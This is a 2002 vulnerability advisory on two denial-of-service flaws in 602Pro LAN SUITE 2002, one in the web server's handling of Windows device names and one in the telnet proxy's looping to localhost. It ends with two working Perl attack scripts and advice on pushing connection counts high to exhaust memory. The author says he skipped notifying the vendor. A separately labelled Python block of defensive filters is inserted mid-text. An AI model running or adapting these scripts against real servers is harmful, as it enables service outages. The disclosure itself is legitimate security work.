Date: August 3, 2002
Author: Stan Bubrouski
Product: 602Pro LAN SUITE 2002
Version: 2002
Vendor: Software602, Inc.
Summary: Denial of Service attacks in webserver and telnet proxy

Description:

There are two denial of service attacks in 602Pro LAN SUITE 2002 for Windows. The problems are described below.

Problem 1: Webserver/Webmail Windows device name DoS attack

The webserver component of LAN SUITE does not filter out requests for files whose names are Windows device names. This means that if you request, say, "/aux.html", the server attempts to open that device as a file and the thread handling the request hangs. The memory and CPU associated with that thread cannot be recovered. By automating connecting and requesting that file it is possible to make Lansuite.exe quickly consume hundreds of megabytes of memory and raise CPU usage to 100%, achieving a denial of service against LAN SUITE. Even after the attack has stopped there is no way to release the consumed resources (memory, CPU) until the process is killed.

Problem 2: The telnet proxy is vulnerable to a DoS attack

The telnet proxy allows connections to localhost, essentially allowing you to connect to the proxy through the proxy, without limit. For example:

Telnet Gateway ready, enter computer name to connect to.
host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.
host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.
host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.

Automating this process causes the Lansuite.exe process to consume more and more memory for as long as the connection remains active; doing this hundreds of times exhausts the resources of the machine.

Solution:

Because no support e-mail address or phone number are available which do not require product registration, I did not report this to the vendor. There was a bug report form, but I hate the idiotic format of these web-based forms and the lack of response you get from them. To me it's clear that if a vendor cared about the quality of its product they would provide a simple e-mail address you could report problems to without having to pay for registration. So in other words, let them burn, I don't care if they don't. Attached are two small proof of concept exploits for the problems.
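Both problems come down to a missing input check on the server side: the web server never asks whether a path component is a DOS device name before opening it, and the telnet proxy never asks whether the requested target is itself. The following Python is an added example of those two checks; it is not part of this advisory or of the vendor's product, and the hostnames, addresses and the resolver table in it are constructed for the demonstration. It goes slightly beyond the "/aux.html" case in the text by also catching URL-encoded names, the "name:" form, and every COM/LPT port.

```python
import ipaddress
import re
import socket
from urllib.parse import unquote

# Classic reserved DOS device names. Opening any of these as a file on
# Windows talks to the device instead of the filesystem, which is why a
# request for /aux.html can hang a server thread.
RESERVED_DEVICE_NAMES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def is_reserved_device_name(component: str) -> bool:
    """True if one path component names a DOS device.

    Windows looks only at the part before the first '.' or ':' (so both
    "aux.html" and "aux:" mean AUX), ignores case, and ignores trailing
    spaces and dots.
    """
    base = re.split(r"[.:]", component, maxsplit=1)[0].rstrip(" .")
    return base.upper() in RESERVED_DEVICE_NAMES


def request_path_is_safe(path: str) -> bool:
    """Reject a request path if any component, after URL decoding, is a
    device name. Both '/' and '\\' count as separators because the Windows
    file API accepts either. The query string is ignored."""
    decoded = unquote(path.split("?", 1)[0])
    for component in re.split(r"[\\/]+", decoded):
        if component and is_reserved_device_name(component):
            return False
    return True


# --- telnet proxy: refuse targets that loop back into the proxy ---------

# Constructed resolver table so the example runs offline. Hosts and
# addresses are hypothetical (RFC 5737 test range).
FAKE_DNS = {
    "localhost": ["127.0.0.1", "::1"],
    "proxy.example.test": ["192.0.2.1"],
    "mail.example.test": ["192.0.2.10"],
}


def fake_resolve(host: str) -> list:
    """Stand-in for DNS: IP literals resolve to themselves, names come
    from FAKE_DNS, anything else fails like a real lookup would."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass
    if host not in FAKE_DNS:
        raise OSError(f"cannot resolve {host}")
    return FAKE_DNS[host]


def real_resolve(host: str) -> list:
    """Real lookup via getaddrinfo; strips IPv6 scope ids ("%eth0")."""
    return [ai[4][0].split("%")[0] for ai in socket.getaddrinfo(host, None)]


def proxy_target_is_allowed(host: str, port: int, proxy_port: int,
                            local_addrs, resolve=real_resolve) -> bool:
    """Allow a proxy target only if it is not the proxy itself.

    Rejects loopback and unspecified addresses outright, rejects any of
    the proxy's own addresses when the port is the proxy's listening port,
    and fails closed when the name cannot be resolved.
    """
    try:
        addrs = resolve(host)
    except OSError:
        return False
    if not addrs:
        return False
    own = {ipaddress.ip_address(a) for a in local_addrs}
    for a in addrs:
        ip = ipaddress.ip_address(a)
        if ip.is_loopback or ip.is_unspecified:
            return False
        if ip in own and port == proxy_port:
            return False
    return True


if __name__ == "__main__":
    for p in ("/index.html", "/aux.html", "/docs/%61ux.html", "/com10.txt"):
        print(f"{p:22} safe={request_path_is_safe(p)}")
    for h in ("localhost", "proxy.example.test", "mail.example.test"):
        ok = proxy_target_is_allowed(h, 23, 23, ["192.0.2.1"], fake_resolve)
        print(f"{h:22} allowed={ok}")
```

In a real proxy `local_addrs` would be the addresses the proxy listens on and `resolve` the default `real_resolve`; the check is done once per hop, so the nested "localhost:23" session in the transcript above is refused at the first prompt. Note that `request_path_is_safe` decodes once; a server that decodes the path twice would need the check applied after its last decoding step.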
#!/usr/bin/perl
#
# lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS
#
# Note: Try very high number of connections and run multiple instances
# of the script for quick results.
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan@ccs.neu.edu)

use Net::Telnet ();

if (!$ARGV[2]) {
    print "Usage $0 <hostname> <port> <connections>\n\n";
    exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];

# A single connection to the proxy; each iteration answers the
# "host[:port]:" prompt with localhost:23, nesting the proxy inside itself.
$t = new Net::Telnet;
$t->open(Host => $host, Port => $port);

foreach (1..$numc) {
    $t->waitfor('/.*host.*/');
    $t->print('localhost:23');
}
#!/usr/bin/perl
#
# lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
#
# Note: Try using a connections setting of 100000+ for obvious results
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan@ccs.neu.edu)

use IO::Socket;

if (!$ARGV[2]) {
    print "Usage $0 <hostname> <port> <connections>\n\n";
    exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];

# Each iteration opens a fresh TCP connection and requests /aux.html,
# which the server tries to open as the AUX device. Reassigning $sock
# drops the previous connection.
foreach (1..$numc) {
    $sock = IO::Socket::INET->new(
        PeerAddr => "$host",
        Proto    => "tcp",
        PeerPort => "$port");
    print $sock "GET /aux.html HTTP/1.0\r\n";
}